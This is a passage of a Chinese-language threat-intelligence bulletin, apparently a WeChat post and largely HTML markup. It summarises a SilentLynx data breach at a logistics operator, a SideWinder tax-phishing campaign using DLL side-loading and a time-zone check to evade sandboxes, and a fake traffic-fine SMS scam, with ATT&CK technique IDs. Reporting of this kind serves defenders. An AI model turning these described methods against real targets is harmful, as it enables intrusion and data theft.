mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">SilentLynx利用不明网络手法入侵Terport内部系统，成功获取关键信息</span></span></p></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">金融, 政法</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://dailydarkweb.net/terport-ransomware-attack-paraguay-port-operator-breached-by-lynx/" target="_blank">https://dailydarkweb.net/terport-ransomware-attack-paraguay-port-operator-breached-by-lynx/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;margin-bottom: 16px;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">2025年12月21日，一领先河运物流运营商遭 SilentLynx 组织网络入侵，该企业主营集装箱货运、杂货码头运营及保税仓储等关键物流服务，旗下拥有高流量运营码头。攻击者通过不明技术手段突破企业安全防护，窃取大量敏感信息，包括内部披露文件、机密运营资料、财务文档及数据加密相关记录，并对获取数据进行加密，公开展示部分加密数据以证实入侵成功。此次攻击以核心物流及运营数据为主要目标，疑似意在通过数据加密实施敲诈勒索等非法获利行为，暴露了企业现有网络安全措施的漏洞。攻击可能导致敏感数据泄露，严重影响企业业务连续性、供应链稳定及品牌声誉，还可能引发后续敲诈勒索等进一步网络安全风险。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">SideWinder伪造税务邮件诱导受害者点击短链接下载恶意文件，实施远程控制与数据窃取</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:bold;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">APT-C-24, Hardcore Nationalist, 响尾蛇, 飞鲨, T-APT-04, SideWinder, Razor Tiger, T-APT4, Rattlesnake, APT-Q-39, SideWinder group, APT-Q-4, HN2, APT-C-17, Baby Elephant, Leafperforator</span></span></p></li><li style="font-size:14px;font-weight:bold;"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">政法</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://cybersecuritynews.com/sidewinder-apt-hackers-attacking-indian-entities/" target="_blank">https://cybersecuritynews.com/sidewinder-apt-hackers-attacking-indian-entities/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">SideWinder 组织通过伪造税务主题邮件实施钓鱼攻击，邮件附带短链接，引导受害者访问仿制税务门户并下载恶意压缩文件。该压缩包包含伪装的二进制文件、恶意 DLL 文件及伪造证书，受害者运行相关程序后，恶意代码借助 DLL 侧加载技术在受信任进程中运行。恶意代码会先校验时区以规避沙盒检测，休眠后下载加载器，在目标系统植入驻留代理程序并生成控制文件，确保长期远程访问与数据窃取。此次攻击通过伪装官方机构、利用信任进程运行恶意代码等手段突破防御，可能导致受害者敏感数据泄露，造成严重安全风险。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">02</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in6w7nn3" style="font-size: 20px;" data-mpa-action-id="md8in6x11o66" data-pm-slice="0 0 []">热点攻击手段</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j8nv91q33"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 10 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">伪造交通罚款短信诱骗用户提供信用卡相关信息</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="font-size: 14px;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">通过命令与控制通道进行数据窃取（T1041）、输入捕获（T1056）、自动化收集（T1119）、鱼叉式钓鱼附件（T1566.001）、金融盗窃（T1657）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j8nug10ts" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/rto-scam-wave-continues-a-surge-in-browser-based-e-challan-phishing-and-shared-fraud-infrastructure/" target="_blank">https://www.hendryadrian.com/rto-scam-wave-continues-a-surge-in-browser-based-e-challan-phishing-and-shared-fraud-infrastructure/</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 